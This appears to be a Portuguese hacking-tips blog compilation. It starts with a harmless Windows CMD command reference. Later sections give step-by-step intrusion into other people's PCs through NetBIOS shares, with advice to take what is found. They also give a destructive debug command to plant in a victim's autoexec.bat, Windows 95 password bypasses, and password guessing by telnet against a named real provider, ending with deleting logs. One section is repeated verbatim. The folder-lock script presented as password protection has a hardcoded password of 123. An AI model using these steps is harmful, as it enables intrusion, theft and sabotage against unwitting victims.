COMANDOS CMD

By Japiinha Truques'
DICAS VARIADAS DO CMD

Para obter mais informações sobre um comando específico, digite HELP

Para exibir o CMD em tela cheia, digite Alt+Enter. Clicando no ícone que se encontra no alto à esquerda, você poderá acessar as propriedades da janela e escolher layout, cores, fontes, etc. Já para localizar texto, rolar tela, selecionar texto, copiar e colar, você deverá clicar com o botão direito do mouse dentro da própria janela e escolher a opção no menu que se abre.

A oção /t:fg permite alterar as cores do interpretador de comandos. Por exemplo, digite cmd /t:17 e a tela ficar com as letras em branco num fundo azul. O f representa a cor do texto e o g a cor do fundo.

Relação das cores que podem ser usadas:

0 - preto
1 - Azul
2 - Verde
3 - Cian
4 - Vermelho
5 - Roxo
6 - Amarelo
7 - Branco
8 - Cinza
9 - Azul claro
A - Verde claro
B - Cian claro
C - Vermelho claro
D - Roxo claro
E - Amarelo claro
F - Branco claro

- Listando arquivos e pastas


Caso queira ver a relação de arquivos e pastas existentes use o comando abaixo:

dir

Existem várias opções para sofisticar a maneira de listar os arquivos e pastas:

/A Exibe arquivos com atributos especificados.
/B Usa formatação básica (sem informações de cabeçalho ou resumo).
/C Exibe o separador de milhar em tamanhos de arquivos. É o padrão. Use /-C para desativar a exibição do separador.
/D O mesmo que amplo, mas os arquivos são classificados na lista por coluna.
/L Usa letras minúsculas.
/N Novo formato de lista longo onde os nomes de arquivos estão à extrema direita.

- Copiando arquivos

O comando copy permite copiar um ou mais arquivos de um lugar para outro. Por exemplo, para copiar todos os arquivos de um disquete para o drive C: digite o comando abaixo:
copy a:*.* c:

Usando o comando copy para copiar apenas um arquivo. Para isto em vez de usar *.* (que indica todos os arquivos) utilize diretamente o nome do arquivo a ser copiado.
copy a:curriculo.doc c:documentos
No exemplo acima o arquivo curriculo.doc será copiado do disquete no drive A: para a pasta Documentos no C:

Se o arquivo curriculo.doc estiver numa pasta chamada Documentos no disquete, seria necessário especificar o caminho para fazer a cópia:
copy a:documentoscurriculo.doc c:documentos
Somente não é necessário especificar o caminho quando o documento a ser copiado estiver na pasta em que o prompt se encontra naquele momento.

O comando copy também pode ser usado para fazer cópia de um mesmo arquivo com outro nome. Como abaixo:

copy agosto.txt setembro.txt

No exemplo existia o arquivo agosto.txt e passou a existir também o arquivo setembro.txt com o mesmo conteúdo do arquivo agosto.txt. O arquivo ficou duplicado, porém com nomes diferentes. O comando pode ser muito útil para substituir ou fazer modificações em um arquivo, mantendo um backup dele

- Usando caracteres coringa

Você pode fazer uso de caracteres coringa no prompt do Windows, quando se utilizar dos comandos copy, dir, del e outros. Os caracteres coringa substituem partes do nome do arquivo. Veja abaixo:

.? - substitui qualquer letra no nome do arquivo
.* - substitui o nome do arquivo ou a parte dele

Exemplos:

copy *.txt fará a cópia de todos os arquivos .txt e não apenas de um arquivo específico
copy a*.doc copiará todos os arquivos .doc que começam com a letra A.

- Mover arquivos ou renomear pastas

O comando move permite tanto mover arquivos quanto renomear pastas. Use-o como abaixo para renomear um arquivo:

move *.txt c:textos

No exemplo acima todos os arquivos de extensão .txt foram movidos para a pasta Textos

Use-o para renomear uma pasta como abaixo:

move textos documentos

No exemplo acima a pasta que se chamava textos passou a se chamar documentos. Se a pasta tiver mais de uma palavra, use-a entre aspas como abaixo:

move "meus textos" documentos

No exemplo acima a pasta meus documentos passou a se chamar documentos.

-Nova pasta

Para criar uma nova pasta basta usar o comando md. Digamos que a gente queira criar uma pasta chamada teste. Basta digitar como abaixo:

md teste

- Movimentar-se de uma pasta para outra

- Se você estiver em c:Windows e quiser passar para a pasta c:games você usará o comando CD. As pastas (diretórios) serão separadas por uma barra invertida:

cdgames

- Agora para mudar de cdgames para a pasta arquivos de programas:

cdarquivos de programas

- Se você estiver em qualquer pasta e quiser passar para o diretório raíz (C:) bastará o comando abaixo:

CD

- Se você estiver em uma subpasta (pasta dentro de outra) e quiser voltar para uma outra que esteja logo acima, use o comando CD conforme abaixo:

CD..

- Removendo pastas

Da mesma forma como você pode criar uma nova pasta com o comando md, poderá deletá-la com o comando rd.

rd teste

O comando acima deleta a pasta teste, se ela estiver vazia. Se a pasta não estiver vazia, você deverá usar o comando rd com a opção /s conforme abaixo:

rd teste /s

No comando acima o Windows vai perguntar se você tem certeza de que deseja remover aquela pasta e tudo quanto se encontra dentro dela. Caso queira que o Windows delete a pasta sem fazer nenhuma pergunta, use também a opção /q como abaixo:

rd teste /s /q

- Deletando arquivos

Você pode apagar um arquivo com o comando del ou erase. É preciso dar logo em seguida o nome do arquivo. Por exemplo, para apagar o arquivo imagem.jpg você pode usar o comando abaixo:

del imagem.jpg ou erase imagem.jpg

- Renomeando arquivos

Para mudar o nome de um arquivo você usa o comando ren. Por exemplo, para mudar o nome do arquivo imagem.jpg para foto.jpg use o comando abaixo:

ren imagem.jpg foto.jpg

- Acerto do relógio e data

O comando time permite acertar a hora e o comando date permite corrigir a data.

- Alguns dos grandes comandos de linha do Windows:

Bootcfg

Permite ver as configurações do seu menu de boot

Defrag

Desfragmentador de disco. Oferece as seguintes opções:
-a Apenas analisar
-f Forçar a desfragmentação mesmo que haja pouco espaço livre.
-v Saída detalhada
-? Exibir tópico de ajuda.

Diskpart

Gerencia as partições de um disco.

Driverquery

Mostra a lista de drivers instalados no Windows e as respectivas propriedades.

Fsutil

O comando fsutil tem vários complementos que serão listados digitando-o sem nenhum parâmetro. Digite fsutil fsingo drives e terá a lista dos drives no seu micro.

Gepresult

Este comando mostrará configurações de usuários e de diretivas de grupos.

Recover

Permite a recuperação de arquvios em disco danificado.

Reg

Comando para exportar chaves do registro, copiar, restaurar, comparar, etc.

Schtasks

Para agendar, executar, alterar ou deletar tarefas numa máquina local ou remota com Windows.

SFC

Comando que permite verificar arquivos de sistemas alterados de forma indevida e recuperar os arquivos originais e oficiais da Microsoft., o que nem sempre será recomendável. Por exemplo, o arquivo uxtheme.dll modificado para permitir o uso de temas voltaria a ser substituído pelo original.

Shutdown

O comando shutdown permite desligar ou reiniciar o computador de forma imediata ou agendada.

Systeminfo

Fornece informações básicas sobre o sistema.

Tasklist

Mostra a lista de processos sendo executados no Windows.

Taskkill

Permite finalizar algum processo. O comando é quase sempre usado com base nas informações fornecidas pelo tasklist. Por exemplo, para finalizar o Messenger digite "taskkill /PID 1680". A identificação do PID de cada processo sendo executado você ficará sabendo com o comando tasklist.

- Diversos outros comandos que você poderá usar no comando de pronto do Windows:

ASSOC
Exibe ou modifica associações de extensões de arquivo.
AT
Agenda comandos e programas para serem executados em um computador.
ATTRIB
Exibe ou altera atributos de arquivos.
BOOTCFG
Mostra o boot.ini no prompt de comando
BREAK
Define ou limpa a verificação estendida CTRL+C.
CACLS
Exibe ou modifica listas de controle de acesso (ACLs) de arquivos.
CALL
Chama um programa em lotes a partir de outro.
CHCP
Exibe ou define o número da página de código ativa.
CHKDSK
Verifica um disco e exibe um relatório de status.
CHKNTFS
Exibe ou modifica a verificação do disco na inicialização.
CLS
Limpa a tela
CMD
Abre uma outra janela de prompt.
COLOR
Define as cores padrão de primeiro plano e do plano de fundo do console
COMP
Compara o conteúdo de dois arquivos ou grupos de arquivos.
COMPACT
Exibe ou altera a compactação de arquivos.
CONVERT
Converte volumes FAT em NTFS.
COPY
Copia um ou mais arquivos para outro local.
DATE
Mostra a data atual e permite alterá-la.
DISKCOMP
Compara o conteúdo de dois disquetes.
DISKCOPY
Copia o conteúdo de um disquete para outro.
DISKPART
Faz particionamento de disco
DOSKEY
Edita linhas de comando, volta a chamar comandos do Windows e cria macros.
ECHO
Exibe mensagens ou ativa ou desativa o eco de comandos.
ENDLOCAL
Encerra a localização de alterações de ambiente em um arquivo em lotes.
EXIT
Sai do programa CMD.EXE (interpretador de comandos).
FC
Compara dois arquivos ou grupos de arquivos e exibe as diferenças entre eles.
FIND
Procura uma seqüência de texto em um arquivo ou arquivos.
FINDSTR
Procura seqüências de texto em arquivos.
FOR
Executa um determinado comando para cada arquivo em um grupo de arquivos.
FORMAT
Formata um disco rígido ou disquete.
FTYPE
Exibe ou modifica os tipos de arquivo utilizados em associações de extensões de arquivos.
GOTO
Direciona o interpretador de comandos do Windows para uma linha identificada em um programa em lotes.
GRAFTABL
Permite que o Windows exiba um conjunto de caracteres estendidos em modo gráfico.
HELP
Fornece informações de ajuda sobre comandos do Windows.
HOSTNAME
Dá o nome do host
IF
Realiza processamento condicional em arquivos em lotes.
IPCONFIG
Mostra detalhes das configurações de IP
LABEL
Cria, altera ou exclui o rótulo de volume de um disco.
MODE
Configura um dispositivo do sistema.
MORE
Exibe a saída fazendo pausa a cada tela.
MOVE
Move um ou mais arquivos de uma pasta para outra pasta.
PAGEFILECONFIG
Configura memória virtual
PATH
Exibe ou define um caminho de pesquisa para arquivos executáveis.
PAUSE
Suspende o processamento de um arquivo em lotes e exibe uma mensagem.
PING
Checa sua conexão de rede disponível
POPD
Restaura o valor anterior da pasta atual salva por PUSHD.
PRINT
Imprime um arquivo de texto.
PROMPT
Altera o prompt de comando do Windows.
PUSHD
Salva a pasta atual e, em seguida, altera a mesma.
REM
Grava comentários (observações) em arquivos em lotes.
REPLACE
Substitui arquivos.
ROUT
Mostra detalhes do parâmetro da interface de rede
SCHTASKS
Agenda e executa algum processo
SET
Exibe, define ou remove variáveis de ambiente do Windows.
SETLOCAL
Inicia a localização de alterações de ambiente em um arquivo em lotes.
SHIFT
Altera a posição dos parâmetros substituíveis em um arquivo em lotes.
SORT
Classifica a entrada.
START
Inicia uma janela separada para executar um programa ou comando especificado.
SUBST
Associa um caminho a uma letra de unidade.
TITLE
Define o título da janela para uma sessão do CMD.EXE.
TREE
Exibe graficamente a estrutura de pastas de uma unidade ou caminho.
TYPE
Exibe o conteúdo de um arquivo de texto.
VER
Mostra a versão do Windows.
VERIFY
Faz com que o Windows verifique se os arquivos estão gravados corretamente em um disco.
VOL
Exibe um rótulo e número de série de volume de disco.
XCOPY
Copia diretórios com seus subdiretórios.

Os comandos abaixo listam comandos adicionais do Windows XP Pro:

eventcreate Permite ao administrador criar uma mensagem e identificação do evento personalizadas em um log de eventos especificado.
eventquery Lista os eventos ou as propriedades de um evento de um ou mais arquivo log.
eventtriggers Mostra e configura disparadores de evento.
getmac Mostra o endereço MAC de um ou mais adaptador de rede.
helpctr Inicia o Centro de Ajuda e Suporte.
ipseccmd Configura o Internet Protocol Security (IPSec)
logman Gerencia o serviço Logs e alertas de desempenho.
openfiles Busca, mostra ou termina arquivos abertos compartilhados.
pagefileconfig Mostra e configura a memória virtual.
perfmon Abre o monitor do sistema.
prncnfg Configure ou mostra as configurações de impressora.
prndrvr Adiciona, deleta e lista drivers de impressoras.
prnjobs Pausa, continua ou cancela lista de documentos a serem impressos.
prnmngr Adiciona, deleta e lista impressoras conectadas, além da impressora default.
prnport Cria, deleta e lista portas de impressora TCP/IP
prnqctl Imprime uma página de teste, pausa ou reinicia um documento a ser impresso.
schtasks Permite que um administrador crie, exclua, consulte, altere, execute e termine tarefas agendadas em um sistema local ou remoto.
systeminfo Busca no sistema informação sobre configurações básicas.
typeperf grava dados de desempenho na janela de comando ou em um arquivo de log. Para interromper Typeperf, pressione CTRL+C.

Outros comandos, mas não do CMD, Tecla Windows à esquerda do teclado, aqui no meu é a bandeirinha do Tio Bill(Microsoft).

Todo teclado atual traz uma tecla Windows que pode ser usada em conjunto com alguma outra tecla para servir de atalho para alguma atividade. Veja abaixo a relação de atalhos da tecla Windows e tire mais proveito dela:

Windows: Mostra o Menu Iniciar
Windows + D: Minimiza ou restaura todas as janelas
Windows + E: Abre Meu computador
Windows + F: Abre o Pesquisar para arquivos
Windows + R: Mostra a janela Executar
Windows + L: Tranca a tela
Windows + U: Abre o Gerenciador de Utilitários
Windows + CTRL + F: Mostra o Pesquisar para computador (em rede)
Windows + Shift + M: Desfaz minimizar (para todas as janelas)
Windows + F1: Para Ajuda e Suporte
Windows + BREAK: Mostra as Propriedades de Sistema

- Comandos relacionados aos Serviços do Windows que podem ser digitados no menu Iniciar / Executar:

compmgmt.msc - gerenciar o computador
devmgmt.msc - gerenciamento de dispositivos
diskmgmt.msc - gerenciamento de discos
dfrg.msc - desfragmentador
eventvwr.msc - visualizar eventos
fsmgmt.msc - pastas compartilhadas
gpedit.msc - diretivas de grupo
lusrmgr.msc - usuários e grupos locais
perfmon.msc - monitor de performance
rsop.msc - conjunto de diretivas resultante
secpol.msc - configurações de segurança
services.msc - serviços gerais
control userpasswords2 - contas de usuário
regedit - registro do windows


Comandos

title nome
- define um nome no título da página.

echo - Exibe uma string na tela.
Ex.: echo teste (escreve teste na tela)

echo. - cria uma linha em branco.

@echo off - Desativa a exibição dos comandos na tela. Deve ser adicionado à primeira linha de um arquivo de lote MS-DOS (*.BAT).

cls - Limpa a tela.

set string = valor; - define uma variável.
Ex.: set a = 10; (define variável a com valor igual a 10)

%string% - chama variável.
Ex.: set a = teste;
echo %a%
(primeiro define a com valor igual a teste, segunda linha escreve na tela o conteúda da variável a, no caso a palavra teste)

pause - pausa as execuções, para prosseguir é necessário pressionar alguma tecla.

md nome - cria um diretório chamado nome.

rd nome - remove o diretório vazio nome.

cd nome - direciona prompt para o diretório nome.

copy diretórioorigem diretóriodestino - copia um arquivo ou pasta de um diretório origem para um diretório destino.
Ex.: copy C:windowsrundll32.exe C:Pasta

del nome - deleta arquivo nome.

deltree diretório - deleta diretório não-vazio e todo seu conteúdo. Este comando pede confirmação (Y/N), para confirmar direto, usa-se deltree/y.

renam nomeantigo.extensão nomenovo.extensão - renomeia arquivos ou pastas.
Ex.: renam C:windowsmistic.exe C:windowsbarret.exe

dir - define conteúdo do diretório.

:nome - cria um parágrafo de orientação chamado nome.

goto nome - direciona a "leitura" para o parágrafo nome.

call arquivo - chama um arquivo de lote do MS-DOS.

start arquivo - inicia uma aplicação do Windows.

date - exibe/altera data.

time - exibe/altera hora.

exit - fecha o prompt do MS-DOS.


Observações
- Para saber informações sobre determinado comando, sua sintaxe, etc, basta digitar comando/?. Ira aparecer na tela uma "ajuda" sobre o comando.
- É super importante você saber no que está mexendo, algumas alterações podem comprometer seu computador.
- Existem alguns comandos de programas como o shutdowm, por exemplo, mas são muitos, é mais fácil você consultar a ajuda deles /?.

Como criar um arquivo de lote? (*.BAT)
Abra o bloco de notas do WinXP, digite os comandos em linhas de acordo com a sua intenção. Salve Como nomedesejado.BAT. É importante esta notação, pois é o que vai definir o arquivo como sendo um arquivo de lote.


-the maskara-
 

INVASÃO POR IP

By Japiinha Truques'
Invasão por IP

Alegria de uns, tristeza de outros, na verdade, aqueles que utilizam a rede Dial-Up do Win95 para sua conecção com a internet podem estar correndo sérios riscos a não ser, é claro, que assim conectam-se propositalmente, com intenções "diversas". Utilizar-se de uma conecção PPP do Win95 num provedor de acesso, significa estar disponibilizando seu computador a todos os usuário da net. Mesmo sem o compartilhamento de arquivos, existem diversas ferramentas que permitem a outra pessoa conectar-se ao seu computador caso você esteja utilizando esse tipo de conecção. conecte-se à Internet utilizando a rede Dial-Up do Win95. Se o seu provedor não disponibilizar uma conecção do tipo PPP, estas dicas não funcionarão. Verifique antes, se você possui os drivers clientes para redes Microsoft. Caso não estejam instalados, instale-os através do Painel de Controle, no ícone Redes. Verifique também se o compartilhamento de Arquivos e Impressoras está instalado. Se estiver, você estará sujeito à que outra pessoa conecte-se ao seu computador simplesmente sabendo seu IP. Se bem que, para aqueles que já sabem, existem mil maneiras diferentes de se "burlar" a fraquinha segurança do Win95. Para você poder encontrar outros computadores compartilhados, você deve configurar WINS e LMHOSTS. O WINS é utilizado para localizar os computadores com IP fixo. O LMHOSTS, é acionado automaticamente na procura de computadores que possuem IP dinâmicos. Configurar essas opções é simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você encontrará a opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Esses servidores são dos USA, e gratuítos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS, você precisa criar um arquivo texto simples, utilizando-se atá mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereços de IP e os nomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção -N, você obterá essa lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis, tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você ainda poderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador

1º- Certifique-se de que a pessoa que você quer invadir possui este programa: nbtstat.

2º- Vá ao Prompt do MS-DOS.

3º- Digite: nbtstat -a o IP do cara que você quer invadir

4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se não aparecerá : Host Not Found (o foda é que não da para invadir o computador de certos caras por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC compartilhamento de arquivos as pastas)

5º- Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve pegar o nome do negócio que estiver com <03> atrás do nome.

6º-Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do cara NetBios dele . O NetBios é aquele nome esquisite que tem o atras. (Digite exatamente daquela forma que eu digitei)

7º- Mapeie sua unidade de disco de forma que a máquina do cara se torne parte de seu PC.

8º- Vá em "Iniciar", "Executar" e digite: //IP_do_cara e ponha "OK"

9º- Pronto! Você invadiu por IP!

10º- Conselho : Não apague nem modifique NADA somente vasculhe bastante nas coisas do individuo e se achar algo interessante pega para você. Nós da Hackerianø´§™ não aconselhamos você a fazer isso, só estamos lhe mostrando como é, mas não para você fazer.

OBS: Tem algumas pessoas que renomeiam o arquivo vnbt.386 no windows\sytem para que se alguem tente te nukar ou invadir não consiga... ; pois bem você vai ter que renomear o seu arquivo senão não da para invadir.





-the maskara-

 

DICAS

By Japiinha Truques'
DICAS HACKER
Estragando um Windows


Para isso você escreve isso no prompt do DOS: echo f 0:0 ffff 0 | debug

Isso estraga alguns programas do Windows. O único problema é que você tem que mexer no computador do cara para isso. Uma dica é colocar no autoexec.bat, o cara nem percebe você mexendo, e ele se ferra, sempre que ligar o micro.

Mas se você não tem como mexer, mas sabe algo de programação, faça um programa que escreva no autoexec dele, quando for passar aquele jogo para ele.

CPU Passwords

Aprenda aqui como penetrar e quebrar passwords da BIOS, do Windows 3.x e do Windows 95. Aproveite pois um dia inesperado pode fazer com que você lembre-se deste artigo...

Bios Password

Para quebrar o password do BIOS você vai precisar de um pouquinho de conhecimento em Hardware. Se você pegar o computador desligado ou esquecer o password.

Siga estas etapas, mencionadas abaixo:

-Ligue o micro e entre no setup;

-Anote TODOS os dados em um papel;

-Desligue e abra a CPU;

-Ache uma bateria na motherboard e retire-a;

-Espere uns 20 minutos e recoloque a bateria;

-Ligue o micro novamente e entre no setup;

-Re-configure TODOS os dados que você anotou.

Password do Windows 3.x

Para quebrar o password do Windows 3.x você deve digitar "ctrl+alt+del" e depois enter quando aparecer a caixa de verificação. Depois que você passou o password, edite o arquivo win.ini e apague as linhas "load=" e "run=".

Password do Windows 95

1- Se a caixa de verificação que aparecer for Password Logon, simplesmente clique em cancel que o sistema entrar.

2- Se a caixa de verificação for Windows Password, digite "ctrl+alt+del", escolha a janela do password na lista que aparecerá e clique em "End Task". Com o password passado, edite o arquivo win.ini e apague as linhas "load=" e "run=".

Cavalo de Tróia

O hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programs, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador.

Farejamento de redes

Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.

Engenharia social

É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.

Quebra-cabeça

Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.

Invasão do servidor

O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.

Dedução

Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:

1. Cerca de 1 em cada 30 usuários usa o login como senha.
2. Muitos administradores usam a senha padrão do sistema.
3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain

Mãos à obra!

Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método por ser ele o mais simples. O penúltimo método também é descrito detalhadamente no FAQ alt.2600.

Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil) e procure pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário é o login do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain).
Agora vem o próximo e mais valioso passo. Tentar pegar a senha do administrador. Para isso consulte o FAQ do alt.2600 e descubra quais são as senhas padrões para o administrador em cada sistema. Novamente usando telnet tente até achar ou desistir. Se você conseguir, vai ter acesso total ao servidor e terá hackeado o sistema! Mas cuidado ao usar a senha... você pode ser pego. Quando usar a senha do administrador, não esqueça de apagar os arquivos log ao sair.

Mas se você não tem como mexer, mas sabe algo de programação, faça um programa que escreva no autoexec dele, quando for passar aquele jogo para ele.

CPU Passwords

Aprenda aqui como penetrar e quebrar passwords da BIOS, do Windows 3.x e do Windows 95. Aproveite pois um dia inesperado pode fazer com que você lembre-se deste artigo...

Bios Password

Para quebrar o password do BIOS você vai precisar de um pouquinho de conhecimento em Hardware. Se você pegar o computador desligado ou esquecer o password.

Siga estas etapas, mencionadas abaixo:

-Ligue o micro e entre no setup;

-Anote TODOS os dados em um papel;

-Desligue e abra a CPU;

-Ache uma bateria na motherboard e retire-a;

-Espere uns 20 minutos e recoloque a bateria;

-Ligue o micro novamente e entre no setup;

-Re-configure TODOS os dados que você anotou.

Password do Windows 3.x

Para quebrar o password do Windows 3.x você deve digitar "ctrl+alt+del" e depois enter quando aparecer a caixa de verificação. Depois que você passou o password, edite o arquivo win.ini e apague as linhas "load=" e "run=".

Password do Windows 95

1- Se a caixa de verificação que aparecer for Password Logon, simplesmente clique em cancel que o sistema entrar.

2- Se a caixa de verificação for Windows Password, digite "ctrl+alt+del", escolha a janela do password na lista que aparecerá e clique em "End Task". Com o password passado, edite o arquivo win.ini e apague as linhas "load=" e "run=".

Cavalo de Tróia

O hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programs, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador.

Farejamento de redes

Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.

Engenharia social

É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.

Quebra-cabeça

Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.

Invasão do servidor

O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.

Dedução

Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:

1. Cerca de 1 em cada 30 usuários usa o login como senha.
2. Muitos administradores usam a senha padrão do sistema.
3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain

Mãos à obra!

Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método por ser ele o mais simples. O penúltimo método também é descrito detalhadamente no FAQ alt.2600.

Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil) e procure pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário é o login do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain).
Agora vem o próximo e mais valioso passo. Tentar pegar a senha do administrador. Para isso consulte o FAQ do alt.2600 e descubra quais são as senhas padrões para o administrador em cada sistema. Novamente usando telnet tente até achar ou desistir. Se você conseguir, vai ter acesso total ao servidor e terá hackeado o sistema! Mas cuidado ao usar a senha... você pode ser pego. Quando usar a senha do administrador, não esqueça de apagar os arquivos log ao sair.




-the maskara-

 

BAIXE VIDEOS DO YOUTUBE

By Japiinha Truques'
OLÁ.
HOJE VOU ENSINAR A VOÇÊS A BAIXAR VIDEOS DO YOUTUBE.

PEGUE O URL DO VIDEO E SUBSTITUA YOUTUBE POR VOOBYS.

BOM APRENDIZADO!

-THE MASKARA-
 

PASTA COM SENHA

By Japiinha Truques'
OLÁ.
HOJE VOU ENSINAR A VOCÊS A COMO COLOCAR SENHA EM PASTAS.

Cria uma pasta onde quiser com qualquer nome
dentro dessa pasta, crie um arquivo .txt (no bloco de notas) com o seguinte comando:



cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
09D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Tem certeza de que deseja bloquear a pasta (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Digite a senha para desbloquear pasta
set/p "pass=>"
if NOT %pass%== 123 goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Senha Invalida
goto end
:MDLOCKER
md Private
echo Private foi criada com sucesso
goto End
:End



ta, agora vai la em Salvar Como e salve assim: locker.bat
